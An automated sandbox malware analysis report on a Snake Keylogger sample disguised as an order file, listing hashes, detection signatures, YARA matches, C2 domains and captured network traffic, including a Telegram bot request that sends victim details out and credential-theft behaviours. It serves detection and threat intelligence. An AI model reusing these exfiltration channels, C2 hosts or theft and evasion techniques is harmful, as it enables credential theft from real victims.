Windows Analysis Report
new order 00041221.exe

Overview

General Information

Sample name: new order 00041221.exe
Analysis ID: 1482843
MD5: f0c82f395d37fa87114ca7ef075695c8
SHA1: 06df165721ef1544251108d1af927786ea7de870
SHA256: d954045a10b2292df4e754ad6f1c5350c82ce0a75d2cd9275ada797eca2c413f
Tags: exePayment
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://anotherarmy.dns.army:8081 Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://aborters.duckdns.org:8081 Virustotal: Detection: 11% Perma Link
Source: http://varders.kozow.com:8081 Virustotal: Detection: 14% Perma Link
Source: http://anotherarmy.dns.army:8081 Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for submitted file
Source: new order 00041221.exe Virustotal: Detection: 41% Perma Link
Source: new order 00041221.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: new order 00041221.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: new order 00041221.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: new order 00041221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 0127F2EDh 3_2_0127F150
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 0127F2EDh 3_2_0127F33C
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 0127FAA9h 3_2_0127F7F1
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A331E8h 3_2_05A32DC0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3F471h 3_2_05A3F1C8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A331E8h 3_2_05A32DD0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A331E8h 3_2_05A33116
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3EBC1h 3_2_05A3E918
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A32C21h 3_2_05A32970
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3F019h 3_2_05A3ED70
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3E769h 3_2_05A3E4C0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3DEB9h 3_2_05A3DC10
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3E311h 3_2_05A3E068
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_05A30040
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_05A30853
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3DA61h 3_2_05A3D7B8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A30D0Dh 3_2_05A30B30
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A31697h 3_2_05A30B30
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3D1B1h 3_2_05A3CF08
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3D609h 3_2_05A3D360
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3F8C9h 3_2_05A3F620
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_05A30673
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 4x nop then jmp 05A3FD21h 3_2_05A3FA78

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49727 -> 203.124.44.4:2525
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.6.168 193.122.6.168
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.moonbrosurgical.com
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 26 Jul 2024 07:03:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.moonbrosurgical.com
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0Q
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003074000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en0
Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000306F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: new order 00041221.exe, 00000003.00000002.3711414422.0000000003096000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/0
Source: new order 00041221.exe, 00000003.00000002.3711414422.00000000030A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
